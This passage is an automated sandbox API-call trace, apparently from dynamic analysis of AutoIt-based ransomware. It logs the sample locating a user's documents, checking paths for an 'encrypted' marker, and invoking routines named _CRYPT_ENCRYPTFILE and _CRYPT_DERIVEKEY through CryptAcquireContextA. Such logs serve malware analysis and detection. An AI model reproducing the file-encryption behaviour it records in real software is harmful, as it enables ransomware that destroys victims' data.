lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0036.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0036.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.132] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0036.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0036.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0036.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0036.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.133] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.133] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0036.133] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.133] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0036.133] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0036.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.133] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.133] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.133] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.133] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3583e280, ftCreationTime.dwHighDateTime=0x1d5b750, ftLastAccessTime.dwLowDateTime=0x36c3c50, ftLastAccessTime.dwHighDateTime=0x1d5bf0e, ftLastWriteTime.dwLowDateTime=0x36c3c50, ftLastWriteTime.dwHighDateTime=0x1d5bf0e, nFileSizeHigh=0x0, nFileSizeLow=0x162af, dwReserved0=0x0, dwReserved1=0x777648, cFileName="d4Y-2lNU.pps", cAlternateFileName="")) returned 0x7c20c0 [0036.133] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0036.133] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.133] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3583e280, ftCreationTime.dwHighDateTime=0x1d5b750, ftLastAccessTime.dwLowDateTime=0x36c3c50, ftLastAccessTime.dwHighDateTime=0x1d5bf0e, ftLastWriteTime.dwLowDateTime=0x36c3c50, ftLastWriteTime.dwHighDateTime=0x1d5bf0e, nFileSizeHigh=0x0, nFileSizeLow=0x162af, dwReserved0=0x0, dwReserved1=0x777648, cFileName="d4Y-2lNU.pps", cAlternateFileName="")) returned 0x7c20c0 [0036.133] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0036.134] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2lNU.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.136] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.136] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0036.136] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0036.136] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.137] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.137] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.137] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.137] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.137] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.137] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3583e280, ftCreationTime.dwHighDateTime=0x1d5b750, ftLastAccessTime.dwLowDateTime=0x36c3c50, ftLastAccessTime.dwHighDateTime=0x1d5bf0e, ftLastWriteTime.dwLowDateTime=0x36c3c50, ftLastWriteTime.dwHighDateTime=0x1d5bf0e, nFileSizeHigh=0x0, nFileSizeLow=0x162af, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="d4Y-2lNU.pps", cAlternateFileName="")) returned 0x7c2100 [0036.137] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0036.137] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.137] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.137] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.137] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.137] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0036.137] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.137] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0036.137] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.137] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.138] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0036.138] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.138] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.138] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.138] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.138] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.138] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0036.138] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.138] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0036.139] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.139] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.139] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0036.139] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.139] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.139] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.139] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.139] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.139] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.139] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.139] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.139] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.139] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.139] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.139] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.139] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0036.139] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.139] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.140] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.140] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.140] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: 